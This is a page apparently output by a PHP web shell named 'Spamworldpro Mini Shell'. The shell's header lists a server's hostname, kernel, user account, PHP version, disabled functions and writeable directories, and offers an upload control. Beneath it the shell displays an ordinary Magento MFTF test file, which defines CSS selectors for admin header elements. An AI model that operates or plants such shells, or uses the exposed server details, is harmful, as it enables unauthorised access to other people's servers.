Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/magento/module-backend/Test/Mftf/Section/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/magento/module-backend/Test/Mftf/Section/AdminHeaderSection.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
 /**
  * Copyright © Magento, Inc. All rights reserved.
  * See COPYING.txt for license details.
  */
-->

<sections xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:noNamespaceSchemaLocation="urn:magento:mftf:Page/etc/SectionObject.xsd">
    <section name="AdminHeaderSection">
        <element name="pageTitle" type="text" selector=".page-header h1.page-title"/>
        <element name="adminUserAccountText" type="text" selector=".page-header .admin-user-account-text" />
        <element name="globalSearchInput" type="text" selector="#search-global" />
        <element name="globalSearchInputVisible" type="text" selector=".search-global-field._active #search-global" />
        <!-- Legacy heading section. Mostly used for admin 404 and 403 pages -->
        <element name="pageHeading" type="text" selector=".page-content .page-heading"/>
        <!-- Used for page not found error -->
        <element name="pageNotFoundTitle" type="text" selector=".page-title span"/>
        <element name="signOut" type="button" selector=".page-header .account-signout"/>
        <element name="pageMainActions" type="block" selector=".page-main-actions"/>
    </section>
</sections>

Spamworldpro Mini